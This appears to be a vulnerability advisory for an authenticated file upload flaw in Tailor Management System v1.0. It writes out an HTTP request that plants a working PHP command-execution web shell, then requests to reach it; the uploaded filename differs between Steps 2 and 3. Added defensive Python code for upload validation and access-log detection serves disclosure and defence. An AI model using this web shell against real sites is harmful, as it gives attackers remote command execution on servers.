# Exploit Title: Tailor Management System - Arbitrary File Upload (Authenticated)
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A



Step 1 - Request

POST /tailor/partedit.php?id=6 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------374227061277520034476021901
Content-Length: 943
DNT: 1
Connection: close
Referer: http://localhost/tailor/partedit.php?id=6
Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0
Upgrade-Insecure-Requests: 1

-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="type"

1
-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="title"

HIPS
-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="detail"

  Take out all of the stuff in the front and back pockets your trouser. The hip measurement should be taken around the hips at the widest point. Stand up in a relaxed posture, and keep the tape parallel. Do not tighten the tape measure. Make sure you can move the tape easily.
-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="bgimg"; filename="cmd10.php"
Content-Type: application/x-php

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
-----------------------------374227061277520034476021901--
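The request above succeeds because the `bgimg` handler stores whatever filename and bytes the client sends into a web-served directory. The following is an added example of the server-side check that would stop it; it is not code from the advisory or from the Tailor Management System project, and the field names, allowed image types and storage scheme are assumptions. It validates the upload by extension allowlist and file magic bytes rather than by the client-supplied Content-Type, refuses executable extensions anywhere in the name, and replaces the client's filename with a server-chosen one.

```python
import os
import secrets
from typing import Tuple

# Allowed image types, mapped to the magic bytes a genuine file of that type starts with.
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Extensions a PHP-enabled web server may execute; never accepted anywhere in the name.
EXECUTABLE_EXTS = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "phps"}


def validate_image_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Decides on the name and the bytes, never on Content-Type."""
    # Strip any path the client sent ("../../x.png" or "C:\x.png") before looking at the name.
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing or empty extension"
    ext = parts[-1]
    if ext not in IMAGE_MAGIC:
        return False, "extension .%s is not an allowed image type" % ext
    # "shell.php.png" can still execute under some Apache AddHandler setups, so refuse inner extensions too.
    if any(p in EXECUTABLE_EXTS for p in parts[:-1]):
        return False, "executable extension inside filename"
    if not any(content.startswith(magic) for magic in IMAGE_MAGIC[ext]):
        return False, "file content does not match the declared image type"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Random server-chosen name (hex + validated extension); the client's name never reaches disk."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed inputs: the advisory's filename with placeholder PHP bytes, and a minimal real PNG header.
    for name, data in [
        ("cmd10.php", b"<?php /* constructed placeholder */ ?>"),
        ("hips.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
        ("hips.php.png", b"\x89PNG\r\n\x1a\n"),
        ("hips.png", b"<?php /* PHP bytes with an image extension */ ?>"),
    ]:
        ok, why = validate_image_upload(name, data)
        print("%-14s -> %s (%s)" % (name, "ACCEPT" if ok else "REJECT", why))
        if ok:
            print("  stored as", storage_name(name))
```

Storing uploads outside the document root, or disabling script execution in the upload directory, is the second layer; the check above is what prevents `cmd10.php` from being written there in the first place.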


Step 2 - Response

GET /tailor/img/part/cmd11.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/tailor/partedit.php?id=6
Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0

Step 3 - Read file uploaded

http://localhost/tailor/img/part/cmd10.php
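Steps 2 and 3 leave a clear trace in the web server's access log: a script extension being fetched from a directory that should only ever serve images, typically shortly after a POST to the upload form from the same client. The following is an added detection example, not code from the advisory or the project; the log lines are constructed, and the upload endpoint and directory paths are taken from the advisory as assumptions about where the application keeps its files.

```python
import re

# Constructed Apache combined-format log lines (not captured from the original advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [08/Sep/2020:10:00:01 +0000] "POST /tailor/partedit.php?id=6 HTTP/1.1" 302 0 "http://localhost/tailor/partedit.php?id=6" "Mozilla/5.0"
10.0.0.5 - - [08/Sep/2020:10:00:03 +0000] "GET /tailor/img/part/cmd10.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [08/Sep/2020:10:01:00 +0000] "GET /tailor/img/part/hips.png HTTP/1.1" 200 8142 "http://localhost/tailor/part.php" "Mozilla/5.0"
10.0.0.9 - - [08/Sep/2020:10:02:00 +0000] "GET /tailor/img/part/cmd10.php?cmd=id HTTP/1.1" 200 64 "-" "curl/7.68.0"
"""

# Paths assumed from the advisory: the upload form and the directory the uploads land in.
UPLOAD_ENDPOINT = "/tailor/partedit.php"
UPLOAD_DIR = "/tailor/img/part/"
EXECUTABLE_EXTS = (".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_access_line(line):
    """Parse one combined-format line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["file"] = rec["path"].split("?", 1)[0].lower()  # path without query string
    return rec


def find_webshell_fetches(log_text):
    """Flag requests for script files inside the image upload directory.

    Each alert records whether the same client had already POSTed to the upload
    form earlier in the log, which is the upload-then-fetch sequence of the advisory.
    """
    uploaders = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_access_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["file"] == UPLOAD_ENDPOINT:
            uploaders.add(rec["ip"])
        if rec["file"].startswith(UPLOAD_DIR) and rec["file"].endswith(EXECUTABLE_EXTS):
            alerts.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": rec["path"],
                "served": rec["status"] == 200,          # 200 means the server ran or returned the file
                "followed_upload": rec["ip"] in uploaders,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_webshell_fetches(SAMPLE_LOG):
        print(alert)
```

The `served` flag separates a probe that got a 404 from a fetch that the server answered, and `followed_upload` is the correlation worth alerting on first; a request for any script file under the upload directory is already abnormal on its own, since that directory should contain nothing but images.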